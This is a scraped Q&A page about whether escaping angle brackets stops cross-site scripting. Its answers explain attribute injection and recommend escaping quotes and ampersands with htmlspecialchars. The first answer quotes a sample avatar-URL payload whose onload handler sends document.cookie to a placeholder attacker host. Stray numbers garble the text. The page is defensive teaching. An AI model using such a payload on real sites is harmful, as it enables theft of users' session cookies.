[ACCEPTED]-Is replacing : < and > with &lt; and &gt; enough to prevent XSS injection?-code-injection

Accepted answer
Score: 19

It depends very much on context.

Check out 11 this example, from a typical forum site...

You 10 may hotlink your avatar image. Enter the 9 full URL.

Malicious user enters in input 8 field

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie) 

There is no encoding there of less 7 than and greater than, but still a big security 6 hole.

With htmlspecialchars(), I found it a good idea to make 5 (or use) a wrapper function of it that casts 4 to a string, provides an easier way to disable 3 double encoding (if necessary) and to ensure 2 it is using the correct character set of 1 your application. Kohana has a great example.

Score: 6

You should also take doublequotes ", singlequotes 9 ' and ampersands & into account. If you do 8 that all during displaying/generating the output, then 7 yes, it's enough.

You should only ensure that you 6 do this for any user-controlled input, such 5 as request parameters, request URL, request 4 headers and user-controlled input which 3 is been stored in a datastore.

In PHP you 2 can do that with htmlspecialchars() and in JSP cou can do 1 that with JSTL <c:out>.

More Related questions